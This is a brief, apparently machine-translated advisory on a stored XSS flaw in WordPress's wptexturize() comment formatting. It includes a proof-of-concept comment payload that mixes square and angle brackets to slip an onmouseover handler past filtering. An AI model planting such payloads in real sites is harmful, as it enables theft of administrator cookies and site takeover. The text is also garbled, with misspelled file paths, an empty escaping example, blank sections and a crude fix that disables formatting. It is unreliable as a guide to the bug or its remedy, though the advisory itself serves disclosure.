WordPress 3.0-3.92 stored XSS Vulnerability Analysis & POC

WordPress 3.0-3.92 stored XSS Vulnerability Analysis & POC

 

Overview:

WordPress is a blog platform developed in PHP. you can build your own website on servers that support PHP and MySQL databases. WordPress can also be used as a Content Management System (CMS.

WordPress versions earlier than 3.92 have recently exposed the XSS vulnerability. Attackers can exploit this vulnerability to steal administrator cookies and upload malicious files.

Details:

The problem lies in the wordpress message service. Generally, some html tags are allowed for messages, such as <a>, <B>, and <code>, some attributes in the tag are in the whitelist. For example, the <a> tag allows the href attribute, but the onmouseover attribute is not allowed.

However, there is a problem with the string Formatting Function wptexturize (). This function will be executed on every message. The function is to convert the current character to an html object, for example, escape "" as "". To prevent interference with the html format, wptexturize () first divides the text into several sections based on the html Tag. In addition to the html tag, there are square brackets tags such as [code]. The split function is completed by the following regular expressions.

In line 2 of the wp-receivdes/formatting. php code:

$textarr = preg_split('/(<.*>|\[.*\])/Us', $text, -1, PREG_SPLIT_DELIM_CAPTURE);

However, if the angle brackets <> and angle brackets [] are mixed in the article, it will lead to escape obfuscation, resulting in some codes not being escaped, forming XSS.

Poc:

Insert in message

 [<a href="xxx" title="]"></a>[" <!-- onmouseover=alert(/xss/)//><!-- -->XSS<a></a>]

 

Malicious JavaScript code can be executed at the front-end and backend.

Front-end:

Background:

Impact scope:

3.0-3.92

Solution:

Modify the parameters in wp-uplodes/formatting. php.

Function wptexturize ($ text) {return $ text; // Add the global $ wp_cockneyreplace line;